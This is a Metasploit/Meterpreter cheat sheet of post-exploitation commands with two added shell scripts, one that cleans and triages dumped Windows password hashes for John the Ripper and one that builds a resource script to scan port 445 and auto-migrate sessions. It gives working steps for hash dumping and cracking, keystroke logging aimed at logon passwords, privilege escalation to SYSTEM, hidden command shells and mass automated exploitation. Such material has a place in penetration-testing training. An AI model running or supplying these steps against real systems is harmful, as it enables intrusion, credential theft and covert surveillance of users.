Metasploit: some commands
show targets lists the targets (OS / service-pack combinations) an exploit module supports; set TARGET <n> forces the exploit to use that target on the victim instead of auto-detecting it (a wrong target is the usual reason a working exploit only crashes the service).
In meterpreter run:
hashdump (then copy-paste the hashes into a file and run john on it; the lines are pwdump format, user:rid:LM:NT:::)
ps + migrate + getpid + getuid
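The copy-paste step above is where mistakes happen: the pasted console output carries prompt and status lines that john cannot parse, and some accounts are not worth cracking at all. The script below is an added example, not part of the original notes; the hashdump sample in it is constructed (Administrator/Guest/bob/alice are made-up accounts; the LM/NT values are the well-known hashes of the empty password and of "password"), and it assumes a POSIX shell with awk and mktemp.

```shell
#!/bin/sh
# Added example: clean Meterpreter `hashdump` output into a pwdump file for
# John the Ripper and triage it before cracking. Sample data is constructed.
# aad3b4...ee is the LM hash of the empty password ("no LM hash stored");
# 31d6cf...c0 is the NT hash of the empty password;
# e52cac.../8846f7... are the LM/NT hashes of "password".
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] this is console noise that must be dropped
alice:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::'

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0

# hashdump_to_pwdump IN OUT: keep only well-formed user:rid:lm:nt::: lines,
# lower-casing the hex so duplicates compare equal; everything else is dropped.
hashdump_to_pwdump() {
  awk -F: 'NF >= 4 && length($3) == 32 && length($4) == 32 &&
           $3 ~ /^[0-9a-fA-F]+$/ && $4 ~ /^[0-9a-fA-F]+$/ {
             print $1 ":" $2 ":" tolower($3) ":" tolower($4) ":::"
           }' "$1" > "$2"
}

# empty_password_accounts FILE: accounts whose NT hash is the empty-string
# hash. Nothing to crack; try logging in with a blank password.
empty_password_accounts() {
  awk -F: -v e="$EMPTY_NT" '$4 == e { print $1 }' "$1"
}

# lm_accounts FILE: accounts that still store a real LM hash (password of at
# most 14 chars, upper-cased, hashed as two 7-byte halves). Crack these first
# with --format=LM; the result seeds the NT crack.
lm_accounts() {
  awk -F: -v e="$EMPTY_LM" '$3 != e { print $1 }' "$1"
}

# Stand-alone demo: write the sample to a temp dir and run the triage.
WORK=$(mktemp -d)
printf '%s\n' "$SAMPLE_HASHDUMP" > "$WORK/hashdump.txt"
hashdump_to_pwdump "$WORK/hashdump.txt" "$WORK/hashes.pwdump"
echo "pwdump lines: $(wc -l < "$WORK/hashes.pwdump" | tr -d ' ')"
echo "empty passwords: $(empty_password_accounts "$WORK/hashes.pwdump" | tr '\n' ' ')"
echo "LM hashes present: $(lm_accounts "$WORK/hashes.pwdump" | tr '\n' ' ')"
# Offline cracking, not run here:
#   john --format=LM "$WORK/hashes.pwdump"
#   john --format=NT "$WORK/hashes.pwdump"
```

Run the LM pass first: LM is case-insensitive and split into two halves, so it falls quickly, and the recovered text narrows the NT search to case variations of the same string.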
Log keystrokes (the keyscan commands belong to the stdapi extension, which a Windows Meterpreter loads by default; use priv is harmless but not needed here):
use priv
keyscan_start (captures only the desktop of the process you are in, so migrate into a process that owns the user's desktop first, e.g. explorer.exe; winlogon.exe catches the logon password)
keyscan_dump
keyscan_stop
Become SYSTEM (getsystem tries several local privilege-escalation techniques in turn; if one works you are NT AUTHORITY\SYSTEM, more than a local admin)
use priv
getsystem
getuid (should now print NT AUTHORITY\SYSTEM)
ps (you will see more processes than before, because SYSTEM sees the processes of every session)
Launch a shell from meterpreter
sysinfo
migrate <pid> (take the PID from ps; a long-lived process such as explorer.exe survives the exploited service dying)
getuid
shell (exit returns you to the meterpreter prompt)
Launch a shell from meterpreter (2)
sysinfo
execute -f cmd.exe -i (-i interacts with the new process; add -H to keep its window hidden from the logged-on user)
Automatic attack! (historical: db_driver and db_autopwn were removed from the framework in 2011; current versions use PostgreSQL, initialised with msfdb init, and db_autopwn survives only as a third-party plugin)
db_driver mysql
(start mysql server)
db_connect root:toor@127.0.0.1/db_autopwn
db_nmap 129.168.6.145 -p445
db_autopwn -p -e -q (-p picks exploits by matching port, -e launches them, -q silences module output; it attacks every host in the db) in alternative use the below
db_autopwn -p -t -e -r -PI 445 -I 192.168.6.130 (-t shows the matching targets, -r uses a reverse-connect payload, -PI restricts to port 445, -I restricts to IP 192.168.6.130) use -PX to exclude a port and -X to exclude an IP range
sessions -v (verbose list of the sessions the exploits opened)
sessions -i <id>
sysinfo
execute -f cmd.exe -i OR run vnc OR run vnc -t OR run vnc -t -p 443 (run vnc is a legacy Meterpreter script; newer versions ship post modules instead)
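Since db_autopwn is gone, the "scan port 445, then act on every host found" loop has to be written as a resource script with commands that still exist. The following is an added example, not the original notes' or the Metasploit project's code: it generates an msfconsole .rc file that runs db_nmap, feeds the hosts with an open 445 into a scanner module with services -R, and sets global session options so every Meterpreter that comes back migrates automatically. The workspace name, target range and LHOST are assumed lab values; the choice of exploit is left to you once smb_version has reported what is listening.

```shell
#!/bin/sh
# Added example: build an msfconsole resource script that replaces the removed
# db_autopwn workflow. Values below are assumptions for a lab, not real targets.
TARGETS=${TARGETS:-192.168.6.0/24}
LHOST=${LHOST:-192.168.6.1}
WORKSPACE=${WORKSPACE:-lab445}

# write_rc OUT: each line is one msfconsole command, run in order by
# `msfconsole -q -r OUT`.
write_rc() {
  cat > "$1" <<EOF
workspace -a $WORKSPACE
db_nmap -n -sV -p 445 $TARGETS
services -p 445 -u
use auxiliary/scanner/smb/smb_version
services -p 445 -u -R
run
setg LHOST $LHOST
setg AutoRunScript post/windows/manage/migrate
hosts
EOF
}

# rc_command_count FILE: number of commands, ignoring blank lines.
rc_command_count() {
  grep -c '[^[:space:]]' "$1"
}

# Stand-alone demo.
OUT=$(mktemp -d)/recon.rc
write_rc "$OUT"
echo "wrote $(rc_command_count "$OUT") commands to $OUT"
# Then (not run here):  msfconsole -q -r "$OUT"
# and, after picking an exploit that matches the smb_version output,
# `services -p 445 -u -R` again inside that module to load RHOSTS from the db.
```

services -R copies the matching hosts into RHOSTS of the currently selected module, which is exactly what db_autopwn's -PI/-I filters used to do; setg makes LHOST and AutoRunScript visible to every module loaded afterwards, so each session migrates out of the exploited process before you get to it.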
Update metasploit
from a shell (or from msfconsole, which passes unknown commands to the OS shell) type: msfupdate (on packaged installs such as Kali, msfupdate defers to the package manager, so apt update && apt install metasploit-framework is the actual update)
see also
www.rapid7.com/docs/ms-pro-user-guide.pdf
www.ol-service.com/sikurezza/doc/netcat_eng.pdf
Other links (not checked)
http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
http://seclists.org/metasploit/2010/q2/74
http://blog.metasploit.com/2007_04_01_archive.html
http://dev.metasploit.com/redmine/issues/1448
http://www.hackforums.net/archive/index.php/thread-1344446.html
http://www.hackforums.net/archive/index.php/thread-67340-5.html
http://ihackmyi.com/topic/95518-metasploit-help/